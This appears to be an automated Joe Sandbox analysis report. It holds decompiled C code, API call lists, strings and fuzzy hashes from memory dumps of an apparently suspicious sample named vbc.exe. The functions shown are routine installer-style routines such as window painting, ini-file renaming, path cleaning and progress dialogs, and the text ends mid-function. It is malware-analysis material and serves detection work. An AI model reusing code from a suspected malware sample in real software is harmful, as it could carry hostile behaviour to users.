Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open$C@
API String ID: 3615053054-3980584120
Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a250;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F41(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x426dc8, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t54 = _t53 + 0x10;
						E00406234(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
						_t13 = E00405DE7(0x4275c8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405E6A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405D4C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405D4C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405DA2(_t25 + _t47, 0x4269c8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405E99(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE7(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405f41
0x00405f50
0x00405f56
0x00405f67
0x00405f8f
0x00405f9a
0x00405f9e
0x00405fbe
0x00405fc5
0x00405fcf
0x00405fdc
0x00405fe1
0x00405fe6
0x00405fea
0x00405ff9
0x00405ffb
0x00406008
0x0040600c
0x004060a7
0x00000000
0x00406022
0x0040602f
0x00406053
0x00406057
0x00406076
0x0040607a
0x0040607a
0x0040607c
0x00406085
0x00406090
0x0040609b
0x004060a1
0x00000000
0x004060a1
0x00406059
0x0040605c
0x00406067
0x00406063
0x00406065
0x00406066
0x00406066
0x0040606e
0x00406070
0x00000000
0x00406070
0x0040603a
0x00406040
0x00000000
0x00406040
0x0040600c
0x00405fea
0x00405f69
0x00405f74
0x00405f7d
0x00405f81
0x00000000
0x00000000
0x00405f81
0x004060b2

APIs

lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405F50
CloseHandle.KERNEL32(00000000), ref: 00405F74
GetShortPathNameW.KERNEL32 ref: 00405F7D

Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E

GetShortPathNameW.KERNEL32 ref: 00405F9A
wsprintfA.USER32 ref: 00405FB8
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
GlobalFree.KERNEL32(00000000), ref: 004060A1
CloseHandle.KERNEL32(00000000), ref: 004060A8

Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

Strings

NUL, xrefs: 00405F4A
%ls=%ls, xrefs: 00405FAE
[Rename], xrefs: 00406022, 00406034

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064A6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405C3D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405BF3(L"*?|<>/\":", _t5))) == 0) {
							E00405DA2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064a8
0x004064b1
0x004064c8
0x004064c8
0x004064cf
0x004064db
0x004064db
0x004064de
0x004064e1
0x004064e6
0x004064e8
0x004064f1
0x004064f5
0x00406512
0x0040651a
0x0040651a
0x0040651f
0x00406521
0x00406524
0x00406529
0x0040652a
0x0040652e
0x0040652e
0x0040652f
0x00406536
0x00406538
0x0040653f
0x00000000
0x00000000
0x00406547
0x0040654d
0x00000000
0x00000000
0x00000000
0x0040654d
0x00406552

APIs

CharNextW.USER32(?), ref: 00406509
CharNextW.USER32(?), ref: 00406518
CharNextW.USER32(?), ref: 0040651D
CharPrevW.USER32(?,?), ref: 00406530

Strings

*?|<>/":, xrefs: 004064F8
C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
"C:\Users\Public\vbc.exe" , xrefs: 004064A6

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1374994687
Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040433D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040434f
0x004043e3
0x00000000
0x004043e3
0x00404360
0x00404364
0x00000000
0x00000000
0x0040436a
0x00404373
0x00404376
0x00404376
0x0040437c
0x00404382
0x00404382
0x0040438e
0x00404394
0x0040439b
0x0040439e
0x004043a1
0x004043a3
0x004043a3
0x004043ab
0x004043b1
0x004043b1
0x004043bb
0x004043c0
0x004043c3
0x004043c8
0x004043cb
0x004043cb
0x004043db
0x004043db
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040435A
GetSysColor.USER32 ref: 00404376
SetTextColor.GDI32(?,00000000), ref: 00404382
SetBkMode.GDI32(?,?), ref: 0040438E
GetSysColor.USER32 ref: 004043A1
SetBkColor.GDI32(?,?), ref: 004043B1
DeleteObject.GDI32(?), ref: 004043CB
CreateBrushIndirect.GDI32(?), ref: 004043D5

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405371 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405371(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2f4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406234(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x00405377
0x00405381
0x00405386
0x0040538c
0x00405397
0x0040539a
0x0040539d
0x004053a3
0x004053a3
0x004053a9
0x004053b1
0x004053b4
0x004053d1
0x004053d5
0x004053de
0x004053de
0x004053e8
0x004053f1
0x004053fd
0x00405404
0x00405408
0x0040540b
0x0040541e
0x0040542c
0x0040542c
0x00405430
0x00405432
0x00405435
0x00000000
0x00405435
0x004053b6
0x004053be
0x004053c6
0x004053cc
0x00000000
0x004053cc
0x004053c6
0x004053b4
0x00405441

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
lstrcatW.KERNEL32 ref: 004053CC
SetWindowTextW.USER32 ref: 004053DE
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E33(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E00406628(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a24c;
				if(_t6 >  *0x42a24c) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D98, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a2f4 & 0x00000001;
					if(( *0x42a2f4 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E17());
						return E00405371(0,  &_v132);
					}
				}
				return _t6;
			}

0x00402e42
0x00402e44
0x00402e4b
0x00402e4e
0x00402e4e
0x00402e54
0x00000000
0x00402e54
0x00402e5c
0x00402e62
0x00000000
0x00402e65
0x00402e6c
0x00402e72
0x00402e78
0x00402e7a
0x00402e80
0x00402ebe
0x00402ec7
0x00000000
0x00402ecc
0x00402e82
0x00402e89
0x00402e9a
0x00000000
0x00402ea8
0x00402e89
0x00402ed4

APIs

DestroyWindow.USER32 ref: 00402E4E
GetTickCount.KERNEL32(00000000), ref: 00402E6C
wsprintfW.USER32 ref: 00402E9A

Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

CreateDialogParamW.USER32 ref: 00402EBE
ShowWindow.USER32(00000000,00000005), ref: 00402ECC

Part of subcall function 00402E17: MulDiv.KERNEL32 ref: 00402E2C

Strings

... %d%%, xrefs: 00402E94

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
Opcode Fuzzy Hash: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C3B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
